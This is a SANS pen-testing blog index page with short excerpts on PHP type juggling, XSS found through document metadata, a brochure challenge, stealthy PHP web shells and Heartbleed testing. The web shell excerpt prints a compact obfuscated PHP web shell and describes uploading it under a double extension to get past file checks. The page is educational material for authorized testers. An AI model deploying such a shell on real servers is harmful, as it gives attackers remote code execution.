SANS Penetration Testing: Category - web pen testing

SANS Penetration Testing:

PHP Weak Typing Woes -- With Some Pontification about Code and Pen Testing

By Josh Wright

The other day I was reading Jos Wetzels' post on the Full Disclosure mailing list regarding a vulnerability in the open source social networking kit HumHub. One of the issues he pointed out was a PHP 'type juggling' attack where an attacker can force a password reset against HumHub for a user many times until a specific value is selected that reduces the password entropy (uniqueness), allowing her to access accounts without authorization.

I have not previously worked with HumHub, but the illustrative code Jos pointed out was intriguing (press CTRL+C to close the cat output after the closing PHP ?> tag):

$ cat >bahhumhubbug.php 
<?php
if (md5('240610708') == md5('QNKCDZO')) { print "Yes, these are the same ...

Finding Zero-Day XSS Vulns via Doc Metadata

[Editor's Note: Chris Andre Dale has a nice article for us about cross-site-scripting attacks, and he's found a ton of them in various high-profile platforms on the Internet, especially in sites that display or process images. He even found one in WordPress and responsibly disclosed it, resulting in a fix for the platform released just a few weeks ago. In this article, Chris shares his approach and discoveries, with useful lessons for all pen testers. Oh... and if you are going to test systems, make sure you have appropriate permission and don't do anything that could break a target system or harm its users. Thanks for the article, Chris! --Ed.]

By Chris Andre Dale

XSS Here, XSS There, XSS Everywhere!


Today Cross-Site Scripting (XSS) is very widespread. While it is not a newly discovered attack vector, we still see it all the time in the wild. Do you remember back in the days, when you would click on a website's ...

Announcing the Awesome New SANS Brochure Challenge

Here's some fun news. SANS just released a new kind of challenge — one that unfolds from the pages of a SANS brochure itself. Created by Jeff McJunkin and a group of challenge-writing collaborators, we launched it this week with the mailing of the SANS Network Security brochure for the upcoming conference in Las Vegas in October 2014. This challenge will take you across many domains of knowledge, including (but not limited to!): infosec fundamentals, pen testing, digital forensics, steganography, social media, mobile devices, and much, much more, all wrapped up in some geeky fun!

You'll enjoy all these areas and more from the comfort of your brochure (paper or pdf) and local computer, along with everyone's favorite global network, the Internet itself. You'll be able to advance all the way through this challenge from anywhere in the world. If

...

Sneaky Stealthy SU in (Web) Shells

[In this article, the inimitable Tim Medin has some fun with PHP web shells, and merges together some clever ideas for interacting with them in a rather stealthier fashion using some Python kung fu! --Ed.]

By: Tim Medin

Here is the scenario: you have a server that allows you to upload an avatar. The site makes sure that the file ends with .jpg, .png, or .gif. Being the sneaky bugger you are (as a professional penetration tester operating within your scope and rules of engagement, naturally), you upload a file named shell.php.jpg, containing this delightful gem:

<?php @extract($_REQUEST); @die ($ctime($atime)); ?>

This file passes the extention check, but since it contains .php in the filename, many systems will execute it as a script. Also, this shell doesn't include the telltale "/bin/sh", "shell_exec", or "system" strings and it looks like some sort of ...

SANS Python Pen Testers | Exploit Heartbleed Vulnerabilities | SEC573

Pen Testers use Python to assess HeartBleed vulnerabilities.

By Mark Baggett

Unless you've been living in a cave without access to the outside world, you already know that OpenSSL 1.0.1 suffers from a serious vulnerability that allows a remote attacker to extract data from the memory of a target computer. The vulnerability was first made "public" (by varying definitions of the word "public") on April 7th. The events leading up to the disclosure are interesting. If you haven't reviewed them, the Sydney Morning Herald does a great job of outlining the events leading up to the disclosure. Check it out here:

http://www.smh.com.au/it-pro/security-it/heartbleed-disclosure-timeline-who-knew-what-and-when-20140415-zqurk.html

So while it is clear as mud who knew about the vulnerability and when, it is very clear what happened

...